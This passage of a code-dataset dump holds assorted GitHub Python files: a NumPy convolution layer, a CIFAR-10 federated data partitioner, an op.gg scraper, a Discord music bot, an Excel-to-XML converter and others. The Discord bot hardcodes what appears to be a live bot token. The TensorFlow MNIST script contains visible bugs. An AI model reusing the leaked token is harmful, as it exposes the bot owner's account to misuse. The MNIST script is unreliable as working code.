debug=True)\n","repo_name":"maximedbs1/projet-crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71633444150","text":"# Do not import any additional 3rd party external libraries as they will not\n# be available to AutoLab and are not needed (or allowed)\n\nimport numpy as np\nfrom resampling import Downsample1d\n\n\ndef sliding_window_view(x, w_shape, axises):\n x_shape = [dim for dim in x.shape]\n for axis, dim in zip(axises, w_shape):\n x_shape[axis] = x_shape[axis] - dim + 1\n\n out_shape = x_shape + list(w_shape)\n out_strides = x.strides + tuple(x.strides[axis] for axis in axises)\n return np.lib.stride_tricks.as_strided(x, strides=out_strides, shape=out_shape, writeable=False)\n\n\nclass Conv1d_stride1:\n def __init__(self, in_channels, out_channels, kernel_size,\n weight_init_fn=None, bias_init_fn=None):\n # Do not modify this method\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n\n if weight_init_fn is None:\n self.W = np.random.normal(\n 0, 1.0, (out_channels, in_channels, kernel_size))\n else:\n self.W = weight_init_fn(out_channels, in_channels, kernel_size)\n\n if bias_init_fn is None:\n self.b = np.zeros(out_channels)\n else:\n self.b = bias_init_fn(out_channels)\n\n self.dLdW = np.zeros(self.W.shape)\n self.dLdb = np.zeros(self.b.shape)\n self.A = None\n\n def forward(self, A):\n \"\"\"\n Argument:\n A (np.array): (batch_size, in_channels, input_size)\n Return:\n Z (np.array): (batch_size, out_channels, output_size)\n \"\"\"\n self.A = A\n # A_stride (np.array): (batch_size, in_channels, window_count, kernel_size)\n # W (np.array): (out_channel, in_channel, kernel_size)\n A_stride = sliding_window_view(A, (self.kernel_size,), (2,))\n # b: batch, i: in_channel, w: window, k: kernel_size, o: out_channel\n Z = np.einsum(\"biwk,oik->bow\", A_stride, self.W)\n Z = Z + self.b[np.newaxis, :, np.newaxis]\n\n # print(\"-->\", A.shape, self.W.shape, \"=>\", Z.shape)\n\n return Z\n\n def backward(self, dLdZ):\n \"\"\"\n Argument:\n dLdZ (np.array): (batch_size, out_channels, output_size)\n Return:\n dLdA (np.array): (batch_size, in_channels, input_size)\n \"\"\"\n dLdZ_stride = np.pad(dLdZ, [(0,), (0,), (self.kernel_size - 1,)], \"constant\", constant_values=0)\n\n # Calculating dLdZ\n # dLdZ_stride (np.array): (batch_size, out_channels, window_count, kernel_size)\n # kernel (np.array): (out_channel, in_channel, kernel_size)\n dLdZ_stride = sliding_window_view(dLdZ_stride, (self.kernel_size,), (2,))\n kernel = np.flip(self.W, axis=2)\n dLdA = np.einsum(\"bowk,oik->biw\", dLdZ_stride, kernel)\n\n # Calculating dLdW\n A_stride = sliding_window_view(self.A, (dLdZ.shape[2],), (2,))\n self.dLdW = np.einsum(\"biks,bos->oik\", A_stride, dLdZ)\n\n # Calculating dLdb\n self.dLdb = np.einsum(\"bos->o\", dLdZ)\n\n return dLdA\n\n\nclass Conv1d:\n def __init__(self, in_channels, out_channels, kernel_size, stride,\n weight_init_fn=None, bias_init_fn=None):\n # Do not modify the variable names\n\n self.stride = stride\n\n # Initialize Conv1d() and Downsample1d() isntance\n self.conv1d_stride1 = Conv1d_stride1(\n in_channels, out_channels, kernel_size,\n weight_init_fn=weight_init_fn, bias_init_fn=bias_init_fn\n )\n self.downsample1d = Downsample1d(stride)\n\n def forward(self, A):\n \"\"\"\n Argument:\n A (np.array): (batch_size, in_channels, input_size)\n Return:\n Z (np.array): (batch_size, 
out_channels, output_size)\n \"\"\"\n\n # Call Conv1d_stride1\n C = self.conv1d_stride1.forward(A)\n\n # downsample\n Z = self.downsample1d.forward(C)\n\n return Z\n\n def backward(self, dLdZ):\n \"\"\"\n Argument:\n dLdZ (np.array): (batch_size, out_channels, output_size)\n Return:\n dLdA (np.array): (batch_size, in_channels, input_size)\n \"\"\"\n # Call downsample1d backward\n dLdC = self.downsample1d.backward(dLdZ)\n\n # Call Conv1d_stride1 backward\n dLdA = self.conv1d_stride1.backward(dLdC)\n\n return dLdA\n\n\nif __name__ == \"__main__\":\n # Test your code here\n weight = np.array([\n [[1, 2], [2, 1]],\n [[0, 1], [1, 0]],\n [[3, 2], [1, 0]]\n ])\n A = np.array([\n [[1, 0, 1, 0, 1],\n [0, 1, 0, 1, 0]],\n ])\n T = Conv1d(2, 3, 2, 2, \n weight_init_fn=lambda *args: weight,)\n T.forward(A)\n dLdZ = np.array([[[1, 1], [2, 1], [1, 2]]])\n dLdA = T.backward(dLdZ)\n print(T.conv1d_stride1.dLdW)\n print(dLdA[0, 0, 1])\n ","repo_name":"MarkChenYutian/FPGATorch","sub_path":"src/Conv1d.py","file_name":"Conv1d.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32924483411","text":"from pytest import fixture # type: ignore\n\nfrom roshi.factory import create_app\n\n\n__all__ = [\n 'app',\n 'config',\n]\n\n\n@fixture\ndef app():\n \"\"\"Roshi create application fixture.\"\"\"\n _app = create_app()\n\n with _app.app_context():\n yield _app\n\n\n@fixture\ndef config(app):\n # pylint: disable=redefined-outer-name\n \"\"\"The application config.\"\"\"\n return app.config\n","repo_name":"defrank/roshi","sub_path":"app/tests/fixtures/_app.py","file_name":"_app.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8284957787","text":"# Import main classes and functions from modules\nfrom .core import (\n GPRModel\n)\n\nfrom .kernels import (\n KernelWrapper\n)\n\n\n# from .likelihoods import (\n# LikelihoodWrapper\n# )\n\n# Import subpackages\n\n__all__ = [\n \"GPRModel\", \"KernelWrapper\"\n]\n\n# Package metadata\n__version__ = \"0.1.0\" # Update the version number as necessary\n","repo_name":"jimmyrisk/EasyGPR","sub_path":"easygpr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"728228564","text":"from sub_commands.sub_command_base import SubCommandBase\n\n\nclass SkillSubCommand(SubCommandBase):\n skill_order_info_list = None\n\n def add_argument(self, subparser):\n subparser.add_argument('-s', '--skill', action='store_true',\n help='include to see skill master order in the output')\n\n def retrieve(self):\n self.fetch_and_set_soup(f\"https://na.op.gg/champion/{self.get_champ_name_no_space()}/statistics/{self.champ_lane}/skill?\")\n\n def parse(self):\n self.skill_order_info_list = self.soup.find(\"div\", class_=\"tabItem Content championLayout-skill\") \\\n .find('div', class_='champion-box-content') \\\n .find_all('li', class_='champion-stats__filter__item')\n self.skill_order_info_list = [info for info in self.skill_order_info_list if info['data-index'] != 'All']\n\n def print(self):\n print(\"Skill Orders:\")\n print(\"{:>7} {:>15} {:>12} {:>12}\".format(\"index\", \"skill order\", \"win rate\", \"pick rate\"))\n for i, skill_order_info in enumerate(self.skill_order_info_list):\n skill_order = ' -> '.join(\n [s.find('span').text for s in 
skill_order_info.find_all('li', class_='champion-stats__list__item')])\n # somehow class names are reversed for pick_rate and win_rate on op.gg\n win_rate = skill_order_info \\\n .find('div', class_='champion-stats__filter_item_value--pickrate') \\\n .find('b').text\n pick_rate = skill_order_info \\\n .find('div', class_='champion-stats__filter_item_value--winrate') \\\n .find('b').text\n print(\"{:>7} {:>15} {:>12} {:>12}\".format(i+1, skill_order, win_rate, pick_rate))\n","repo_name":"hurjun1995/LeagueKipedia","sub_path":"sub_commands/skill_sub_command.py","file_name":"skill_sub_command.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"73476009270","text":"\n\nimport tensorflow as tf\nimport input_data\nimport matplotlib\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\nx=tf.placeholder(tf.float32,[None,28,28,1])\nt=tf.placeholder(tf.float32,[None,10])\n\nx=tf.reshape(x,[-1,784])\n\n\nw =tf.Variable(tf.zeros(784,10))\nb = tf.Variable(tf.zeros(10))\n\ninit_op=tf.global_variables_initializer()\n\ny=tf.nn.softmax(tf.matmul(x,w)+b)\n\ncross_entropy=-tf.reduce_sum(t*tf.log(y))\n\nis_correct=tf.equal(tf.argmax(y,1),tf.argmax(t,1))\naccuracy=tf.reduce_sum(tf.cast(is_correct,tf.float32))\n\noptimizer=tf.train.GradientDescentOptimizer(learning_rate=0.03)\ntrain_step=optimizer.minimize(cross_entropy)\n\nwith tf.Session() as sess:\n sess.run(init_op)\n\n\nwith tf.Session() as sess:\n for step in range(1000):\n batch_xs,batch_ys=mnist.train.next_batch(100)\n sess.run(train_step,feed_dict={x: batch_xs,t: batch_ys})\n\n if step%100==0:\n acc,loss=sess.run([accuracy,cross_entropy])\n feed_dict={x:batch_xs,t:batch_ys}\n acc, loss = sess.run([accuracy, cross_entropy])\n feed_dict = {x: mnist.test.images, t: mnist.test.labels}\n\n","repo_name":"huntershuai/tensorflow","sub_path":"demo_mnist.py","file_name":"demo_mnist.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23846734084","text":"import pandas as pd\r\nimport xml.etree.ElementTree as ET\r\nimport xml.dom.minidom as minidom\r\nimport openpyxl\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import datetime\r\n\r\n# Открываем файл Excel\r\nworkbook = openpyxl.load_workbook('test_input.xlsx')\r\n\r\n# Выбираем активный лист\r\nsheet = workbook.active\r\n\r\n# Чтение значения из ячейки и вычисление результата\r\nvalue = sheet['B3'].value\r\nresult = sheet['B2'].value\r\ndate = sheet['B1'].value\r\n\r\n# Соединяем значения вместе\r\nresult_formula = f\"SABR0000001{date.strftime('%d%m%Y')}{result}\"\r\n# Чтение данных из файла Excel\r\ndf = pd.read_excel('test_input.xlsx', skiprows=4)\r\n\r\n# Создание корневого элемента\r\ncertdata = ET.Element('CERTDATA')\r\n\r\n# Добавление элемента FILENAME\r\nfilename = ET.SubElement(certdata, 'FILENAME')\r\nfilename.text = result_formula\r\n\r\n# Создание элемента ENVELOPE\r\nenvelope = ET.SubElement(certdata, 'ENVELOPE')\r\n\r\n# Создание элемента ECERT для каждой строки данных\r\nfor _, row in df.iterrows():\r\n ecert = ET.SubElement(envelope, 'ECERT')\r\n ET.SubElement(ecert, 'CERTNO').text = str(row['Ref no'])\r\n ET.SubElement(ecert, 'CERTDATE').text = str(row['Issuance Date']).split()[0]\r\n ET.SubElement(ecert, 'STATUS').text = str(row['Status'])\r\n ET.SubElement(ecert, 'IEC').text = str(row['IE Code'])\r\n ET.SubElement(ecert, 'EXPNAME').text = 
str(row['Client'])\r\n ET.SubElement(ecert, 'BILLID').text = str(row['Bill Ref no'])\r\n ET.SubElement(ecert, 'SDATE').text = str(row['SB Date']).split()[0]\r\n ET.SubElement(ecert, 'SCC').text = str(row['SB Currency'])\r\n ET.SubElement(ecert, 'SVALUE').text = str(row['SB Amount'])\r\n\r\n # Получение курса доллара США с сайта ЦБ РФ\r\n sb_date = datetime.strftime(row['SB Date'], \"%d.%m.%Y\")\r\n response = requests.get(f\"https://www.cbr.ru/currency_base/daily/?UniDbQuery.Posted=True&UniDbQuery.To={sb_date}\")\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n rate_usd = soup.find('td', text='Доллар США').find_next_sibling('td').text.replace(',', '.')\r\n\r\n # Вычисление значения атрибута SVALUEUSD\r\n svalue_rub = float(row['SB Amount'])\r\n svalue_usd = round(svalue_rub / float(rate_usd), 2)\r\n\r\n # Добавление атрибута SVALUEUSD\r\n svalue_usd_elem = ET.SubElement(ecert, 'SVALUEUSD')\r\n svalue_usd_elem.text = str(svalue_usd)\r\n\r\n# Создание и сохранение XML-файла\r\nxml_str = minidom.parseString(ET.tostring(certdata)).toprettyxml(indent=\"\\t\", encoding='UTF-8')\r\n\r\n# Запись в файл\r\nwith open(\"output_xml2.xml\", \"w\", encoding='UTF-8') as f:\r\n f.write(xml_str.decode())\r\n","repo_name":"SysoevAS/Python-test-task","sub_path":"Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13542987755","text":"class Student:\n def __init__(self, fname):\n self.fname = fname\n self.tags = ['ID', 'LAST NAME', 'FIRST NAME', 'CLASS', 'GPA']\n\n def openfile(self):\n with open(self.fname, 'r') as self.f:\n self.content = self.f.readlines()\n \n def format(self):\n for val in self.content:\n newlst = val.split(',')\n for index in range(5):\n print(self.tags[index], ':', newlst[index])\n\n\n\nbag1 = Student('/Users/puhal/Documents/Python/DSA/Chapter1/StudentsDB.txt')\n\nbag1.openfile()\nbag1.format()","repo_name":"Puhalenthi/-MyPythonBasics","sub_path":"Python/DSA/Chapter1/StudentFileReader.py","file_name":"StudentFileReader.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9165034277","text":"from torchvision import datasets, transforms\r\nfrom fedlab.utils.dataset.partition import CIFAR10Partitioner\r\nfrom fedlab.utils.functional import partition_report #save_dict\r\nimport numpy as np\r\n#in-place 操作可能会覆盖计算梯度所需的值。\r\n\r\n#每个 in-place 操作实际上都需要重写计算图的实现。out-of-place只是分配新对象并保留对旧计算图的引用,\r\n# 而 in-place 操作则需要将所有输入的创建更改为代表此操作的函数。\r\n\r\n#输出高度 = (输入高度 + 2 * 填充 - 卷积核高度)/ 步幅 + 1\r\n#输出宽度 = (输入宽度 + 2 * 填充 - 卷积核宽度)/ 步幅 + 1\r\n#默认的步幅(stride=1)和填充(padding=0)\r\n#池化层\r\n#输出特征图高度 = (输入特征图高度 - 池化窗口高度)/ 步幅 + 1\r\n#输出特征图宽度 = (输入特征图宽度 - 池化窗口宽度)/ 步幅 + 1\r\n\r\n\r\nclass Dataset(object):\r\n '''\r\n #cifar10训练集每个data_batch,10000,其中十个类别是随机独立同分布,\r\n #DATA.sampler.SubsetRandomSampler用于从给定列表按照列表元素对应样本索引在数据集中抽取样本并\r\n # 进行打乱,比如抽取样本索引为[25,86,34,75],返回给loader可能会变为[34,86,25,75]\r\n #因此不需要shuffle进行打乱,因为已经打乱了\r\n '''\r\n def __init__(self, conf, dir_alpha = 0.3) -> None:\r\n self.conf = conf\r\n self.train_dataset, self.eval_dataset = self.get_dataset(self.conf['data_dir'], self.conf['type'])\r\n self.dataset_indice_list = self.get_indice(dir_alpha)\r\n \r\n def get_dataset(self, dir, name):\r\n\r\n if name=='mnist':\r\n transform_train = transforms.Compose([ transforms.ToTensor(), \r\n transforms.Normalize((0.5,), (0.5,)) \r\n ]) \r\n train_dataset = datasets.MNIST(dir, 
train=True, download=True, transform=transform_train())\r\n eval_dataset = datasets.MNIST(dir, train=False, transform=transforms.ToTensor())\r\n\r\n\r\n\r\n elif name=='cifar10':\r\n if True:\r\n transform_train = transforms.Compose([\r\n # transforms.RandomResizedCrop(32, scale=(0.8, 1.0)),\r\n # transforms.Resize((224, 224)),\r\n transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n # transforms.RandomRotation((-45,45)), #随机旋转\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\r\n ])\r\n # transform_train = transforms.Compose([transforms.Resize((224, 224)),\r\n # transforms.RandomHorizontalFlip(p=0.5),\r\n # transforms.ToTensor(),\r\n # transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),])\r\n \r\n transform_test = transforms.Compose([transforms.ToTensor(),transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])\r\n train_dataset = datasets.CIFAR10(dir, train=True, download=True,transform=transform_train)\r\n eval_dataset = datasets.CIFAR10(dir, train=False, transform=transform_test)\r\n else :\r\n pass\r\n return train_dataset, eval_dataset\r\n \r\n def get_indice(self, dir_alpha):\r\n num_clients = self.conf['config_train'].UAV_NUM\r\n num_samples = len(self.train_dataset)\r\n print(num_samples)\r\n \r\n client_sample_nums = [np.random.randint(800,1000) for i in range(num_clients)]\r\n \r\n\r\n ####absolutely balance and iid\r\n # client_sample_nums = [np.array(10000) for i in range(num_clients)]\r\n # dataset_indice_list = []\r\n # all_range = list(range(len(self.train_dataset)))\r\n # data_len = int(len(self.train_dataset) / num_clients)\r\n # for i in range(num_clients):\r\n # dataset_indice = all_range[i * data_len: (i + 1) * data_len]\r\n # dataset_indice_list.append(dataset_indice)\r\n\r\n\r\n #######generate data distribution by fedlab------------------\r\n num_classes = 10\r\n seed = 2023\r\n #####Hetero Dirichlet\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=None,\r\n # partition=\"dirichlet\",\r\n # dir_alpha=0.3,\r\n # seed=seed)\r\n ####基于shards的划分\r\n # num_shards = 200\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=None,\r\n # partition=\"shards\",\r\n # num_shards=num_shards,\r\n # seed=seed) \r\n \r\n ###均衡IID\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=True,\r\n # partition=\"iid\",\r\n # seed=seed)\r\n ###非均衡IID划分\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=False,\r\n # partition=\"iid\",\r\n # unbalance_sgm=0.3,\r\n # seed=seed)\r\n \r\n ####均衡dirichlet划分\r\n # print(self.train_dataset.targets[:100])\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=True,\r\n # partition=\"dirichlet\",\r\n # dir_alpha=0.3,\r\n # verbose=False,\r\n # seed=seed)\r\n # print(self.train_dataset.targets[:100])\r\n ###非均衡dirichlet划分\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=False,\r\n # partition=\"dirichlet\",\r\n # unbalance_sgm=0.3,\r\n # dir_alpha=0.3,\r\n # seed=seed)\r\n\r\n #####\r\n ######\r\n # dataset_indice_list = []\r\n # for i in range(num_clients):\r\n # dataset_indice = cifar10part.client_dict[i]\r\n # dataset_indice_list.append(dataset_indice)\r\n #######------------------------generate data distribution by myself\r\n 
print(client_sample_nums)\r\n client_dic = self.client_inner_dirichlet_partition_v2(self.train_dataset.targets, num_clients=num_clients,num_classes=num_classes,\r\n dir_alpha=dir_alpha, client_sample_nums=client_sample_nums, seed=seed)\r\n \r\n # client_dic = self.iid(num_samples=num_samples, client_sample_nums=client_sample_nums)\r\n dataset_indice_list = [client_dic[i] for i in range(num_clients)]\r\n ######---------------------------\r\n for i in range(len(dataset_indice_list)):\r\n for j in range(i+1, len(dataset_indice_list)):\r\n set_c = set(dataset_indice_list[i]) & set(dataset_indice_list[j])\r\n # assert not set_c , \"存在相同元素\"\r\n assert len(set_c) == 0, \"存在同一元素\"\r\n\r\n return dataset_indice_list\r\n\r\n\r\n\r\n def client_inner_dirichlet_partition(self, targets, num_clients, num_classes, dir_alpha,\r\n client_sample_nums, verbose=False, seed=2023):\r\n # np.random.seed(seed)\r\n if not isinstance(targets, np.ndarray):\r\n targets = np.array(targets)\r\n if not isinstance(client_sample_nums, np.ndarray):\r\n client_sample_nums = np.array(client_sample_nums)\r\n ####\r\n client_priors = np.random.dirichlet(alpha=[dir_alpha] * num_clients,\r\n size=num_classes)\r\n prior_cumsum = np.cumsum(client_priors, axis=1)\r\n idx_list = [np.where(targets == i)[0] for i in range(num_classes)]\r\n\r\n class_amount = [len(idx_list[i]) for i in range(num_classes)]\r\n client_indices = [np.zeros(client_sample_nums[cid]).astype(np.int64) for cid in\r\n range(num_clients)]\r\n print('总样本数:', np.sum(client_sample_nums))\r\n i = 0\r\n j = 0\r\n while np.sum(client_sample_nums) != 0:\r\n curr_class = np.random.randint(num_classes)\r\n i +=1\r\n if verbose:\r\n print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n # Redraw class label if no rest in current cline samples\r\n if class_amount[curr_class] <= 0:\r\n continue\r\n class_amount[curr_class] -= 1\r\n curr_prior = prior_cumsum[curr_class]\r\n while True:\r\n curr_cid = np.argmax(np.random.uniform() <= curr_prior)\r\n # If current node is full resample a client\r\n \r\n if client_sample_nums[curr_cid] <= 0:\r\n continue\r\n j +=1\r\n client_sample_nums[curr_cid] -= 1\r\n client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n idx_list[curr_class][class_amount[curr_class]]\r\n\r\n break\r\n print('循环取样个数,大于等于总样本数', i)\r\n print('赋值个数,应该等于总样本数' , j)\r\n client_dict = {cid: client_indices[cid] for cid in range(num_clients)}\r\n return client_dict\r\n \r\n #######solution2, not suitable for sampling few data\r\n # class_priors = np.random.dirichlet(alpha=[dir_alpha] * num_classes,\r\n # size=num_clients)\r\n # while np.sum(client_sample_nums) != 0:\r\n # curr_cid = np.random.randint(num_clients)\r\n \r\n # if verbose:\r\n # print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n # # If current node is full resample a client\r\n # if client_sample_nums[curr_cid] <= 0:\r\n # continue\r\n # client_sample_nums[curr_cid] -= 1\r\n # curr_prior = prior_cumsum[curr_cid]\r\n # while True:\r\n # curr_class = np.argmax(np.random.uniform() <= curr_prior)\r\n # # Redraw class label if no rest in current class samples\r\n # if class_amount[curr_class] <= 0:\r\n # continue\r\n # class_amount[curr_class] -= 1\r\n # client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n # idx_list[curr_class][class_amount[curr_class]]\r\n\r\n # break\r\n \r\n def client_inner_dirichlet_partition_v2(self, targets, num_clients, num_classes, dir_alpha,\r\n client_sample_nums, verbose=False, seed=2023):\r\n '''old version '''\r\n # np.random.seed(seed)\r\n 
if not isinstance(targets, np.ndarray):\r\n targets = np.array(targets)\r\n\r\n # rand_perm = np.random.permutation(targets.shape[0])\r\n # targets = targets[rand_perm]\r\n\r\n class_priors = np.random.dirichlet(alpha=[dir_alpha] * num_classes,\r\n size=num_clients)\r\n prior_cumsum = np.cumsum(class_priors, axis=1)\r\n idx_list = [np.where(targets == i)[0] for i in range(num_classes)]\r\n class_amount = [len(idx_list[i]) for i in range(num_classes)]\r\n\r\n client_indices = [np.zeros(client_sample_nums[cid]).astype(np.int64) for cid in\r\n range(num_clients)]\r\n print('总样本数:', np.sum(client_sample_nums))\r\n i = 0\r\n j = 0\r\n while np.sum(client_sample_nums) != 0:\r\n i+=1\r\n curr_cid = np.random.randint(num_clients)\r\n # If current node is full resample a client\r\n if verbose:\r\n print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n if client_sample_nums[curr_cid] <= 0:\r\n continue\r\n client_sample_nums[curr_cid] -= 1\r\n curr_prior = prior_cumsum[curr_cid]\r\n while True:\r\n curr_class = np.argmax(np.random.uniform() <= curr_prior)\r\n # Redraw class label if no rest in current class samples\r\n if class_amount[curr_class] <= 0:\r\n continue\r\n class_amount[curr_class] -= 1\r\n j+=1\r\n client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n idx_list[curr_class][class_amount[curr_class]]\r\n\r\n break\r\n print('循环取样个数,大于等于总样本数', i)\r\n print('赋值个数,应该等于总样本数' , j)\r\n client_dict = {cid: client_indices[cid] for cid in range(num_clients)}\r\n return client_dict\r\n\r\n def iid(self, num_samples, client_sample_nums):\r\n rand_perm = np.random.permutation(num_samples)\r\n num_cumsum = np.cumsum(client_sample_nums).astype(int)\r\n client_dict = self.split_indices(num_cumsum, rand_perm)\r\n return client_dict\r\n \r\n def split_indices(self, num_cumsum, rand_perm):\r\n client_indices_pairs = [(cid, idxs) for cid, idxs in\r\n enumerate(np.split(rand_perm, num_cumsum)[:-1])]\r\n client_dict = dict(client_indices_pairs)\r\n return client_dict\r\n\r\n\r\n","repo_name":"Boyhood-99/research2","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8977350207","text":"#!/usr/bin/env python\nfrom decida.FormulaCalculator import FormulaCalculator\n\nfc = FormulaCalculator(None,\n title=\"field mowing calculator\",\n par_specs = [\n [\"n\", \"number of turns\", \"\", 43, \"t\"],\n [\"dr\", \"swath\", \"ft\", 3, \"n\"],\n [\"s\", \"speed\", \"ft/s\", 3, \"n\"],\n [\"t\", \"total time\", \"min\", 100, \"n\"],\n ],\n recalc_specs = [\n [\"t\", \"t = n*(n+1)*(dr*pi)/(s*60.0)\"],\n [\"n\", \"n = sqrt(0.25 + (s*60.0*t)/(dr*pi)) - 0.5\"],\n ]\n)\n","repo_name":"preritt/decida","sub_path":"decida/test/test_FormulaCalculator_3.py","file_name":"test_FormulaCalculator_3.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11654720659","text":"import numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\nclass PartialDependence:\n def __init__(self, model, X: pd.DataFrame, feature: str) -> None:\n self.feature = feature\n self.model = model\n self.X = X.copy()\n self.result = self._get_result()\n\n @property\n def mean_prediction(self) -> float:\n # Get the mean prediction of the model on the input data\n return self.model.predict(self.X).mean()\n\n def fit(self, value) -> None:\n # Update input 
data with given value of the feature\n self.X[self.feature] = value\n\n def _prepare_values(self) -> np.ndarray:\n # Prepare a sequence of values to use for computing partial dependence\n if self.X[self.feature].dtype in (np.int64, int):\n min_, max_ = self.X[self.feature].min(), self.X[self.feature].max()\n return np.unique(np.linspace(min_, max_, 100, dtype=int))\n elif self.X[self.feature].dtype in (np.float64, float):\n min_, max_ = self.X[self.feature].min(), self.X[self.feature].max()\n return np.linspace(min_, max_, 100)\n return self.X[self.feature].unique()\n\n def _get_result(self) -> pd.DataFrame:\n # Compute the average prediction for each prepared value of the feature\n data = {self.feature: [], 'avg_risk_score': []}\n for value in self._prepare_values():\n self.fit(value)\n data[self.feature].append(value)\n data['avg_risk_score'].append(self.mean_prediction)\n return pd.DataFrame(data).sort_values(self.feature).reset_index(drop=True)\n\n def plot(self, is_categorical: bool = False, show: bool = False, **kwargs) -> go.Figure:\n # Generate a plot of the partial dependence results\n if not is_categorical:\n fig = px.line(x=self.result[self.feature], y=self.result['avg_risk_score'])\n fig.update_xaxes(title_text=self.feature)\n fig.update_yaxes(title_text='avg risk score')\n # Generate a bar plot of the partial dependence results for categorical feature\n else:\n fig = px.bar(y=self.result[self.feature], x=self.result['avg_risk_score'], orientation='h')\n fig.update_yaxes(title_text=self.feature)\n fig.update_xaxes(title_text='avg risk score')\n fig.update_layout(title_text=f'Partial Dependence', **kwargs)\n if show:\n fig.show()\n return fig\n","repo_name":"wiese-m/survival-studio","sub_path":"explanation/global_explanation/partial_dependence.py","file_name":"partial_dependence.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"44570588237","text":"import discord\n#from discord.ui import Button, View\nfrom discord.ext import commands\nfrom youtube_dl import YoutubeDL\n\nYDL_OPTIONS = {'format': 'worstaudio/best', 'noplaylist': 'False', 'simulate': 'True',\n 'preferredquality': '192', 'preferredcodec': 'mp3', 'key': 'FFmpegExtractAudio'}\n#FFMPEG_OPTIONS_LOCAL = {'before_options': '-f dshow', 'options': ''}\nFFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix='!', intents=intents)\n\n# проверка запуска бота + его статус\n@bot.event\nasync def on_ready():\n print('Bot connected')\n await bot.change_presence(status = discord.Status.online, activity = discord.Game('захват мира'))\n\n# команда (!ping) для проверки работы бота в дс\n@bot.command()\nasync def ping(ctx):\n await ctx.send('pong')\n\n# команда (!join) для присоединения бота к голосовому каналу\n@bot.command()\nasync def join(ctx, url):\n vc = await ctx.message.author.voice.channel.connect()\n\n with YoutubeDL(YDL_OPTIONS) as ydl:\n if 'https://' in url:\n info = ydl.extract_info(url, download=False)\n else:\n info = ydl.extract_info(f\"ytsearch:{url}\", download=False)['entries'][0]\n \n link = info['formats'][0]['url']\n \n vc.play(discord.FFmpegPCMAudio(executable=\"C:/FFmpeg/bin/ffmpeg.exe\", source=link, **FFMPEG_OPTIONS))\n\n #src = \"audio=CABLE Output (VB-Audio Virtual Cable)\"\n\n #vc.play(discord.FFmpegPCMAudio(executable = 
\"C:/FFmpeg/bin/ffmpeg.exe\", source=src, **FFMPEG_OPTIONS_LOCAL))\n\n# команда (!leave) для отсоединения бота от голосового канала\n@bot.command()\nasync def leave(ctx):\n await ctx.message.guild.voice_client.disconnect()\n\nbot.run('MTA3MzM0MjkyODE0NTEwMDkwMA.Gs5DA7.0D4g4JgJeFHe2kQZICH757LkCQfXgZcG_KPZNA')\n","repo_name":"sadness18/ds_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36733692879","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # **Hypothesis Testing**\n# \n\n# The goal of hypothesis testing is to answer the question, “Given a sample and an apparent effect, what is the probability of seeing such an effect by chance?” The first step is to quantify the size of the apparent effect by choosing a test statistic (t-test, ANOVA, etc). The next step is to define a null hypothesis, which is a model of the system based on the assumption that the apparent effect is not real. Then compute the p-value, which is the 